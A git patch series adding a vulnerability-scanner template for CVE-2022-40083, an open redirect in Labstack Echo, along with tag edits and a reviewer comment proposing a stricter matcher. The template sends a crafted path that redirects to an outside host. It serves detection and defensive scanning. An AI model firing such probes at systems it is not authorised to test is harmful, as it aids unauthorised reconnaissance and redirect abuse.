From 38d59c31fa6e6a46a8ee9306ce953a9a2395e5f8 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 7 Oct 2022 21:41:42 +0530
Subject: [PATCH 1/3] Added CVE-2022-40083
---
 cves/2022/CVE-2022-40083.yaml | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 cves/2022/CVE-2022-40083.yaml
diff --git a/cves/2022/CVE-2022-40083.yaml b/cves/2022/CVE-2022-40083.yaml
new file mode 100644
index 00000000000..dd576199d56
--- /dev/null
+++ b/cves/2022/CVE-2022-40083.yaml
@@ -0,0 +1,31 @@
+id: CVE-2022-40083
+
+info:
+ name: Labstack Echo < v4.9.0 - Open Redirect
+ author: pdteam
+ severity: medium
+ description: |
+ Labstack Echo v4.8.0 was discovered to contain an open redirect vulnerability via the Static Handler component. This vulnerability can be leveraged by attackers to cause a Server-Side Request Forgery (SSRF).
+ reference:
+ - https://github.com/labstack/echo/issues/2259
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2022-40083
+ cwe-id: CWE-601
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}//interactsh.com%2f.."
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: location
+ words:
+ - '//interactsh.com/../'
+
+ - type: status
+ status:
+ - 301
\ No newline at end of file
From e275c207233e46ff163317945d660ab1aa5fbebf Mon Sep 17 00:00:00 2001
From: Sandeep Singh
Date: Fri, 7 Oct 2022 21:43:33 +0530
Subject: [PATCH 2/3] added tags
---
 cves/2022/CVE-2022-40083.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-40083.yaml b/cves/2022/CVE-2022-40083.yaml
index dd576199d56..d6effe7301b 100644
--- a/cves/2022/CVE-2022-40083.yaml
+++ b/cves/2022/CVE-2022-40083.yaml
@@ -13,6 +13,7 @@ info:
 cvss-score: 6.1
 cve-id: CVE-2022-40083
 cwe-id: CWE-601
+ tags: cve,cve2022,redirect,labstack,echo
 
 requests:
 - method: GET
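Review bot: In the new `cves/2022/CVE-2022-40083.yaml` (PATCH 1/3), the `word` matcher on `part: location` passes when `//interactsh.com/../` appears anywhere in the header value. A 301 that stays on the scanned host but echoes the decoded request path inside an absolute URL could therefore be reported as an open redirect. Anchoring the check to the start of the value ties the finding to a redirect whose authority is the injected host: change the matcher to `- type: regex` with `part: location` and `regex:` `- '^//interactsh\.com/\.\./'`. The description also presents the issue as leading to SSRF, while the matchers confirm only the redirect (CWE-601). A one-line comment above `matchers:` saying so, such as `# confirms the redirect only; SSRF impact is not verified`, would keep triage accurate.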
@@ -28,4 +29,4 @@ requests:
 
 - type: status
 status:
- - 301
\ No newline at end of file
+ - 301
From 838c426330350c42daa040fa4c87c3a30d6822e0 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 11 Oct 2022 15:48:48 +0530
Subject: [PATCH 3/3] Update CVE-2022-40083.yaml
---
 cves/2022/CVE-2022-40083.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-40083.yaml b/cves/2022/CVE-2022-40083.yaml
index d6effe7301b..54cdac8d578 100644
--- a/cves/2022/CVE-2022-40083.yaml
+++ b/cves/2022/CVE-2022-40083.yaml
@@ -13,7 +13,7 @@ info:
 cvss-score: 6.1
 cve-id: CVE-2022-40083
 cwe-id: CWE-601
- tags: cve,cve2022,redirect,labstack,echo
+ tags: cve,cve2022,redirect,labstack
 
 requests:
 - method: GET